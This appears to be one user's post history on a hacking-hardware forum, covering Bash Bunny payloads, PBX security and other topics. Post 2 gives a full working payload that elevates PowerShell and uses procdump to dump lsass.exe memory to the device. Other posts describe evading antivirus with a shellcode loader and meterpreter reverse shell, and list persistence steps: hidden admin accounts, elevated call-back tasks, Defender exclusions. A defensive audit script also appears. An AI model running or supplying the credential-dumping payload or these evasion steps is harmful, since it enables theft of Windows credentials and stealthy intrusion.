rottingsun
Posts posted by rottingsun

  1. There are a few basic strategies, some hardware-based and some software-based. Normally a special type of firewall called a session border controller is placed in front of the PBX. They're designed to address issues like toll fraud. Other things can be done too, though. General PBX hardening best practices should be enforced, like strong SIP account passwords, limiting SIP sessions to only your authorized private subnets, not allowing outgoing international calling, not allowing outgoing calling to offshore US territories, turning off call transfer feature codes for incoming calls, not exposing your PBX directly to a public IP, etc. On top of that, you must monitor logs regularly.

     

    Here's a presentation that's FreePBX based but includes general best practices.

    https://player.vimeo.com/video/130328541

  2. Here's my working code for running an executable (procdump) from the bunny within powershell and saving the dump file to the bunny, given the user has local admin privs to begin with. Note that in the line that runs procdump, the & character occurs at the front of the command. It is a special powershell operator that evaluates the text following the & character as a command and not a powershell object.

     

    LED Y 100

    source bunny_helpers.sh

    LED B 100
    ATTACKMODE HID STORAGE
    Q GUI r
    Q DELAY 500
    Q STRING powershell Start-Process powershell -Verb runAs
    Q ENTER
    Q DELAY 1000
    Q ALT y
    Q DELAY 500
    Q STRING \$bunny\=\(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \|  Select-Object -ExpandProperty DriveLetter\)
    Q DELAY 500
    Q ENTER
    Q DELAY 500
    Q STRING \& \$bunny\\payloads\\$SWITCH_POSITION\\Procdump\\procdump.exe -accepteula -ma lsass.exe \$bunny\\loot\\takeadump\\lsd.dmp
    Q ENTER

    Q DELAY 200
    Q STRING \$driveEject\=New-Object -comObject Shell.Application
    Q ENTER
    Q DELAY 200
    Q STRING \$driveEject.Namespace\(17\).ParseName\(\$bunny\).InvokeVerb\(\"Eject\"\)
    Q ENTER
    Q DELAY 200

    Q STRING exit
    Q ENTER
    LED FINISH

  3. 3 hours ago, B0rk said:

    It should only be blocking the shell.bat file as it is known by AV manufacturers. It was only put on there as an example/placeholder (the LHOST is set to 10.10.10.10 and LPORT to 8443). It's just a Veil-Evasion generated payload. Everything else should execute just fine.

    A technique I've been experimenting with that gets past both Win Defender and Vipre AV currently is a custom shellcode loader, as per http://www.attactics.org/2016/03/bypassing-antivirus-with-10-lines-of.html. I've used the loader almost verbatim with a shikata_ga_nai meterpreter rev_tcp payload to successfully bypass both.

  4. 4 minutes ago, Vert said:

    when you connect over rdp it pops a 30 sec window saying ok or cancel that another user is logging in it isn't very sneaky the way this is setup. if someone knows a better sneakier method it could be interesting as i noted my intent was legit usage for system repairs.

    Very nice. I actually never thought of the bunny/ducky in the context of legitimate uses. :grin:

     

    I got a bunny personally so I can demo to management what happens if I grant a non-IT user local admin perms like I sometimes get asked. 

  5. 2 hours ago, Broti said:

     

    My favourite password manager: KeePass. Open source and it supports different systems 

     

    KeePass is really awesome. Just make sure an attacker using Empire doesn't get a shell on your system. It includes a module called KeeThief which can display your master password in cleartext. 

  6. 8 minutes ago, Dave-ee Jones said:

    Thing is, to create an Admin user you first need Admin rights, therefore you don't really get anywhere with creating a Meterpreter payload.

     

    Right, but this payload actually does assume that the machine being attacked is already logged in with admin rights as per the description - 

    #OS: Windows (Requires Powershell and Admin Rights)

     

    This would be a great payload for the case of a target running, say, Windows 10 Home as the default user that also happens to be part of the Local Admins group. It's safe to assume that probably a lot of home users run Windows like that. On the other hand, this payload should NEVER work in a corporate/AD environment if even the most basic security practices are being followed. I am sure we'd all be shocked though at the number of AD setups where every user is a local admin, and god forbid, a domain admin.

     

  7. 56 minutes ago, Dave-ee Jones said:

    I was thinking of doing something like this - passing credentials to a PC to create a user, but then someone *glares at Posh* was like "No you idiot, that can't be done because that was an old type of hack that got patched ages ago!"

    But you have shown here that it can be done :)

    Anything can be done with a little ingenuity and local admin privs, which this payload does assume that the logged in user has. I have several ideas that could enhance this already good payload, including: 

    - The one I previously posted about. That is, making the new user invisible to the Windows logon screen.

    - Creating an elevated scheduled task (Run with Highest Privileges option) with the new user creds. The task executes a meterpreter payload to connect back to the attacking machine after 1 minute, 5 minutes, whatever. The meterpreter session created from the scheduled task returns with UAC already bypassed, allowing for a simple getsystem command to elevate within meterpreter. EDIT: Actually it looks like meterpreter shell already does this the way it's implemented here.

    - Using Set-MpPreference to disable Windows Defender, although this is a bit "noisy" since it displays a tray popup. An alternative would be to use Set-MpPreference to set a folder exception for Windows Defender before copying any binaries that might otherwise be flagged from the bunny to the exception folder. 

    - Use powershell to add a Windows Firewall exception to allow all incoming traffic from your attacking IP. 

    The possibilities are endless. I guess I just need to break down and order a bunny. 

    • Upvote 1
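From the defender's side, the four enhancements listed in the post above each leave a host-local artifact. The following audit script is an added example, not code from the thread or from the Bash Bunny project; it assumes an elevated PowerShell 5.1+ session on Windows 10 and uses only built-in cmdlets (LocalAccounts, ScheduledTasks, Defender and NetSecurity modules). The SpecialAccounts\UserList path is the standard Winlogon key used to hide accounts from the logon screen.

```powershell
# Added example (not from the thread): audit a Windows 10 host for the
# local-admin abuse artifacts listed above. Run elevated, PowerShell 5.1+.
$findings = [System.Collections.Generic.List[object]]::new()
function Add-Finding($Check, $Detail) {
    $findings.Add([pscustomobject]@{ Check = $Check; Detail = $Detail })
}

# 1. Accounts hidden from the logon screen (a DWORD of 0 under UserList hides the account)
$ul = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList'
if (Test-Path $ul) {
    foreach ($name in (Get-Item $ul).Property) {
        if ((Get-ItemPropertyValue -Path $ul -Name $name) -eq 0) {
            Add-Finding 'HiddenLogonAccount' $name
        }
    }
}

# 2. Current members of the local Administrators group (review anything unexpected)
Get-LocalGroupMember -Group 'Administrators' | ForEach-Object {
    Add-Finding 'LocalAdminMember' "$($_.Name) [$($_.PrincipalSource)]"
}

# 3. Scheduled tasks that run with highest privileges and launch PowerShell
Get-ScheduledTask | Where-Object {
    $_.Principal.RunLevel -eq 'Highest' -and
    ($_.Actions | Where-Object { $_.Execute -match 'powershell' })
} | ForEach-Object { Add-Finding 'ElevatedPowerShellTask' "$($_.TaskPath)$($_.TaskName)" }

# 4. Defender state: real-time protection switched off, or path exclusions present
$mp = Get-MpPreference
if ($mp.DisableRealtimeMonitoring) { Add-Finding 'DefenderRealtimeOff' 'DisableRealtimeMonitoring=True' }
foreach ($p in $mp.ExclusionPath) { Add-Finding 'DefenderPathExclusion' $p }

# 5. Enabled inbound allow rules scoped to a single remote IPv4 host
Get-NetFirewallRule -Direction Inbound -Action Allow -Enabled True | ForEach-Object {
    $addr = (($_ | Get-NetFirewallAddressFilter).RemoteAddress) -join ','
    if ($addr -match '^\d{1,3}(\.\d{1,3}){3}$') {
        Add-Finding 'InboundAllowFromSingleHost' "$($_.DisplayName) <- $addr"
    }
}

$findings | Format-Table -AutoSize
```

Each finding type maps to one bullet in the post, so an empty table after a Bunny-style run against a test VM means the check itself needs adjusting, not that the host is clean.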
  8. I think you can use the analog trunk cards to connect the Asterisk server to a legacy PBX system. Normally they'd be used to trunk out to the physical phone lines. It would only make sense if you needed to transition a larger PBX to a VoIP system without serious service interruption.

    Yes you can, but depending on the systems, it can be somewhat of a major pain in the ass to get it working just right.

  9. I always travel with only 2 bags, both of which I usually carry onto the plane (I don't like checking because of chances for lost luggage or theft). One is a small brown leather bag containing all of my clothes, and the other is my laptop backpack. That's the main reason I was asking the question really - if the overlords at the x-ray machine will make a fuss over a pineapple.

  10. Just for some additional background, Palo Alto Networks is a firewall company started by Nir Zuk. It's up for debate who was the very first to come up with the tech, but Nir Zuk is widely reputed to be the guy who invented stateful packet inspection while working for Check Point Software. Stateful inspection is the tech that almost all modern enterprise firewalls are based on. It's a huge compliment (in my humble opinion, at least) that a company like PAN mentioned the Pineapple by name.
